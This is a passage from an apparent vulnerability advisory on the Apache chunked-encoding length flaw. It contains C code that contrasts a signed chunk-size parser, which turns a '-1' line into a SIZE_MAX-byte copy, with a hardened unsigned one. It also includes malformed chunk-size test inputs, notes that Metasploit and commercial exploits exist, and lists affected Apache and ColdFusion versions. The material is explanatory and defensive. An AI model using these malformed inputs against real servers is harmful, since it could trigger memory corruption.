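    size_t v = 0;
    int ndigits = 0;
    const char *p = line;

    for (;; p++) {
        int d;
        if (*p >= '0' && *p <= '9')      d = *p - '0';
        else if (*p >= 'a' && *p <= 'f') d = *p - 'a' + 10;
        else if (*p >= 'A' && *p <= 'F') d = *p - 'A' + 10;
        else break;
        if (v > (SIZE_MAX >> 4))         /* the next shift would wrap: reject */
            return -1;
        v = (v << 4) | (size_t)d;
        ndigits++;
    }
    if (ndigits == 0)                    /* empty line, '-', '+', or garbage */
        return -1;
    if (*p != ';' && *p != '\r' && *p != '\n' && *p != '\0')
        return -1;                       /* trailing junk after the digits */
    *out = v;
    return 0;
}

/* Hardened clamp: both operands unsigned, so the result never exceeds bufsize. */
size_t clamp_len_unsigned(size_t chunk_len, size_t bufsize)
{
    return chunk_len < bufsize ? chunk_len : bufsize;
}

/* Outcome of the hardened path for one chunk-size line:
 * -1 = line rejected, otherwise the clamped number of bytes to copy. */
long hardened_copy_len(const char *line, size_t bufsize)
{
    size_t v;
    if (parse_chunk_size(line, &v) != 0)
        return -1;
    return (long)clamp_len_unsigned(v, bufsize);
}

int main(void)
{
    /* Constructed chunk-size lines as a client might send them. */
    const char *lines[] = { "64", "1A;ext=x", "-1", "FFFFFFFFFFFFFFFFFF" };
    size_t i;
    for (i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        long slen = chunk_len_signed(lines[i]);
        long hlen = hardened_copy_len(lines[i], CHUNK_BUF_SIZE);
        printf("chunk-size line %-20s signed path: len=%ld -> copy %zu bytes; ",
               lines[i], slen, clamp_len_signed(slen, CHUNK_BUF_SIZE));
        if (hlen < 0)
            printf("hardened path: reject (malformed chunk size)\n");
        else
            printf("hardened path: copy %ld bytes\n", hlen);
    }
    return 0;
}
```

Running it shows the signed path turning the "-1" line into a copy of `SIZE_MAX` bytes while the hardened path rejects it outright; the two fixes that matter are parsing into an unsigned type (so no sign can be accepted) and clamping with an unsigned comparison, and a real server would additionally read an oversized chunk in buffer-sized pieces rather than copying it at all.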

- Exploit

Functional exploit code is available.

A Metasploit Framework exploit has become available.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

UPDATE (January 11, 2008): An updated exploit for CORE IMPACT is available.

- Solution

Please see the referenced advisories for more information and fixes.


Macromedia ColdFusion Server MX Professional

Macromedia ColdFusion Server MX Enterprise

Macromedia ColdFusion Server MX Developer

Apache Software Foundation Apache 1.0

HP Compaq Secure Web Server for OpenVMS 1.0 -1

Apache Software Foundation Apache 1.0.2

Apache Software Foundation Apache 1.0.3

Apache Software Foundation Apache 1.0.5

Apache Software Foundation Apache 1.1

HP Compaq Secure Web Server for OpenVMS 1.1 -1

Apache Software Foundation Apache 1.1.1

HP Compaq Secure Web Server for OpenVMS 1.2

Apache Software Foundation Apache 1.2

Apache Software Foundation Apache 1.2.5

Apache Software Foundation Apache 1.3

Apache Software Foundation Apache 1.3.1

Apache Software Foundation Apache 1.3.11

Apache Software Foundation Apache 1.3.12

Apache Software Foundation Apache 1.3.13

Apache Software Foundation Apache 1.3.14

Apache Software Foundation Apache 1.3.14 Mac

Apache Software Foundation Apache 1.3.15

Apache Software Foundation Apache 1.3.16

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.18

Apache Software Foundation Apache 1.3.19

Apache Software Foundation Apache 1.3.20

Apache Software Foundation Apache 1.3.22

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites